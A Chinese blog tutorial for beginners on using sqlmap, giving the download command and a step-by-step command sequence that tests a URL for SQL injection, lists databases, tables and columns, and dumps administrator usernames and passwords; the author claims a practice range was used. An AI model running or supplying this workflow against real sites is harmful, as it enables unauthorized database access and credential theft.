小白渗透必备工具sqlmap的使用方法

首先,需要一个本期的主角:sqlmap[玫瑰][滑稽][玫瑰]

先声明一下,问问题可以,请好好看看帖子和置顶内容,没有的自然会回你,有的我就不管了[阴险]
再声明一下,一切违法违规行为与本人无关,请在下载24小时内删除

下载的命令
git clone https://github.com/sqlmapproject/sqlmap.git

下面的是给小白先了解一下的,会一点的可以往下翻(用的是靶场,违规不得已才改成这样[泪])
首先检测一个站点是否能进行sql注入
输入命令:(网址后面必须是什么什么等于一个数字例如id=1)
sqlmap -u “这里是你的网址” –batch
他就会自动扫描出现图4
就大概率代表可以注入
然后输入:
sqlmap -u “你的地址” –batch –dbs
看到像图5那样,然后输入以下命令
sqlmap -u “你的地址” –batch -D 随便选一个之前爆出来的库放在这里例如我之前的maoshe –tables
然后出现图6,这些是库里的表,然后输入命令
sqlmap -u “你的网址” –batch -D 看上次的解释 -T 这里填你要爆破的表名例如我的admin –columns
然后出现图7,这些就是具体的数据了
然后输入命令(进行爆破账号和密码)
sqlmap -u “你的网址” –batch -D 看上次的解释 -T 看上次的解释 -C username,password –dump
然后出现图8,这里就是管理员的账号和密码了(没爆破完,网不好[心碎])

这个是手册几乎包括所有sqlmap的使用方法
https://xsfzl.lanzoum.com/iCPKG05opuuf
密码:50s9图片[1]-小白渗透必备工具sqlmap的使用方法-朝晞小屋图片[2]-小白渗透必备工具sqlmap的使用方法-朝晞小屋图片[3]-小白渗透必备工具sqlmap的使用方法-朝晞小屋图片[4]-小白渗透必备工具sqlmap的使用方法-朝晞小屋图片[5]-小白渗透必备工具sqlmap的使用方法-朝晞小屋图片[6]-小白渗透必备工具sqlmap的使用方法-朝晞小屋图片[7]-小白渗透必备工具sqlmap的使用方法-朝晞小屋图片[8]-小白渗透必备工具sqlmap的使用方法-朝晞小屋

文章版权声明 1、本网站名称:朝晞小屋
2、本站永久网址:https://www.zxiyun.com/
3、更多有趣网站:http://dh.zxiyun.com/
4、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ2604140139进行删除处理。
5、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
7、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。

© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发

请登录后发表评论